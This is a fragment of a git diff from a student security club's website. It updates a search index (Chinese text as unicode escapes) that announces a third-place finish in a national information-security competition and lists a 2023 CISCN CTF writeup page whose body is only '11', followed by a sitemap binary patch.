\u5927\u8d5b\u5f3a\u8c03\u8d34\u8fd1\u5b9e\u6218\uff0c\u4ee5\u4fe1\u606f\u5b89\u5168\u5178\u578b\u884c\u4e1a\u5e94\u7528\u573a\u666f\u4e3a\u5927\u8d5b\u73af\u5883\uff0c\u91cd\u70b9\u68c0\u9a8c\u53c2\u8d5b\u5b66\u751f\u9762\u5bf9\u771f\u5b9e\u73af\u5883\u4e0b\u7684\u4fe1\u606f\u5b89\u5168\u5de5\u7a0b\u80fd\u529b\u548c\u653b\u9632\u6280\u672f\u80fd\u529b\u3002

\u5927\u8d5b\u5f3a\u8c03\u4f01\u4e1a\u4e0e\u9ad8\u6821\u7684\u8054\u5408\uff0c\u901a\u8fc7\u6821\u4f01\u5bf9\u63a5\u7684\u4f01\u4e1a\u5bfc\u5e08\u52a0\u5b66\u751f\u6218\u961f\u7684\u6a21\u5f0f\uff0c\u5c06\u4f01\u4e1a\u8d44\u6e90\u7eb3\u5165\u5230\u9ad8\u6821\u7684\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4e13\u4e1a\u4eba\u624d\u57f9\u517b\u4e2d\uff0c\u5e76\u5b9e\u73b0\u4eba\u624d\u4ece\u9ad8\u6821\u5230\u4f01\u4e1a\u7684\u65e0\u7f1d\u5bf9\u63a5\u3002

\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4e3a\u4e00\u9879\u5468\u671f\u4e3a\u4e00\u5e74\u7684\u5168\u56fd\u6027\u8054\u8d5b\u8d5b\u4e8b\uff0c\u7531\u591a\u4e2a\u533a\u57df\u5206\u7ad9\u8d5b\u548c\u5e74\u5ea6\u603b\u51b3\u8d5b\u7ec4\u6210\u3002

\u672c\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u8363\u83b7\u7b2c\u4e09\u540d\uff0c\u62ff\u4e0b\u4e09\u7b49\u59565000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u83b7\u5956\u56fe\u7247\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"writeup/CISCN-CTF-Quals-2023/","title":"2023\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521d\u8d5bWriteup","text":"

11

"}]} \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index e4a3c15809926e462a269c121c8d2b58ea8801f1..a932b02d18d756dd677d3befc3c55f370a5ab142 100755 GIT binary patch delta 14 VcmaFP@|=ZLzMF$%2023全国大学生信息安全竞赛初赛Writeup - +

11